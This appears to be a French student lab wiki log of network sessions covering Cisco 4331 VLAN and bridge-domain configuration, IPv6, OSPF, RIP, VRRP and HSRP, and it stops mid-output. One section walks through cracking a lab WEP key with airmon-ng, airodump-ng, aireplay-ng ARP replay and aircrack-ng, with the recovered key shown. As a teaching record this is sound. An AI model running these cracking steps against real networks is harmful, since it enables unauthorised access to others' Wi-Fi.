 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | RAID5 - Cryptage de données&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (additionnel - 7-8/12/2016)&lt;br /&gt;
 | Modification configuration routeur pour prise en charge Wifi - Sécurisation Wifi par WPA-EAP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 9 (12/12)&lt;br /&gt;
 | Configuration DHCP - PCBX&lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère séance ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e et 3e séance (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e séance====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5e séance====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 6e séance (additionnel) ====&lt;br /&gt;
=====Configuration HSRP=====&lt;br /&gt;
Le VRRP n'était pas compatible sur le routeur du groupe 6 (3560E) à cause de la trop faible version de 'IOS Cisco. Du coup, il nous a été demandé de mettre en place le protocole en dessous de VRRP, HSRP.&amp;lt;br /&amp;gt;&lt;br /&gt;
Le protocole HSRP fonctionne comme le VRRP, et s'implémente, par BDI, comme suit:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Sstandby 1 ip 10.60.X.3&lt;br /&gt;
standby 1 preempt&lt;br /&gt;
standby 1 priority 100&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il fallait aussi que notre routeur soit connecté au 2e commutateur via une liaison fibre en mode trunk. Ainsi, nous pouvons voir, dans ce qui suit, que le routeur maitre est le routeur 3560E, et que nous sommes en standby !&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;BDI2 - Group 1 (version 2)&lt;br /&gt;
  State is Standby&lt;br /&gt;
    7 state changes, last state change 00:01:16&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
